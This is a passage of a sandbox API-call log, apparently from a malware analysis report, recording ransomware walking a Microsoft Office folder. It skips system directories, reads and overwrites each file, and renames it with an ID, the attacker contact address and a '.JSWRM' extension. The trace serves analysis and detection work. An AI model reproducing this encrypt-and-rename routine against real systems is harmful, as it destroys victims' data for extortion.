lpString2="...") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="windows") returned -1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="recovery") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="perflogs") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="documents and settings") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="$RECYCLE.BIN") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="system volume information") returned 1 [0122.138] lstrcmpiW (lpString1="VISCOLOR.VSL", lpString2="msocache") returned 1 [0122.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISCOLOR.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0122.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISCOLOR.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISCOLOR.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\viscolor.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.192] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45152) returned 1 [0122.192] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb060) returned 0x24e1d8 [0122.193] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb060, lpOverlapped=0x0) returned 1 [0122.197] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.197] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb060, lpOverlapped=0x0) returned 1 [0122.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.198] CloseHandle (hObject=0x238) returned 1 [0122.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0122.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0122.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0122.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0122.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0122.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.199] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISCOLOR.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\viscolor.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISCOLOR.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\viscolor.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0122.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.200] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18ccc9d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xcd8c0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISINTL.DLL", cAlternateFileName="")) returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2=".") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="..") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="...") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="windows") returned -1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="recovery") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="perflogs") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="documents and settings") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="system volume information") returned 1 [0122.200] lstrcmpiW (lpString1="VISINTL.DLL", lpString2="msocache") returned 1 [0122.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0122.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0122.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0122.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0122.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.201] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4809621, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4809621, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4809621, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO.CSS", cAlternateFileName="")) returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2=".") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="..") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="...") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="windows") returned -1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="recovery") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="perflogs") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="documents and settings") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="$RECYCLE.BIN") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="system volume information") returned 1 [0122.201] lstrcmpiW (lpString1="VISIO.CSS", lpString2="msocache") returned 1 [0122.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.CSS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO.CSS", lpUsedDefaultChar=0x0) returned 9 [0122.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.CSS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO.CSS", lpUsedDefaultChar=0x0) returned 9 [0122.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0122.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0122.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.202] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0122.202] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0122.202] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0122.204] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.204] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0122.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0122.204] CloseHandle (hObject=0x238) returned 1 [0122.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0122.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0122.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0122.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0122.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0122.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0122.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0122.206] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x38d65f7, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x38d65f7, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4809621, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4b7b8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO.HXS", cAlternateFileName="")) returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2=".") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="..") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="...") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="windows") returned -1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="recovery") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="perflogs") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="documents and settings") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="$RECYCLE.BIN") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="system volume information") returned 1 [0122.206] lstrcmpiW (lpString1="VISIO.HXS", lpString2="msocache") returned 1 [0122.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.HXS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO.HXS", lpUsedDefaultChar=0x0) returned 9 [0122.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO.HXS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO.HXS", lpUsedDefaultChar=0x0) returned 9 [0122.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0122.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0122.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0122.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.207] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=309176) returned 1 [0122.207] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.208] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.222] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.222] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.222] CloseHandle (hObject=0x238) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0122.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0122.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0122.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.223] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 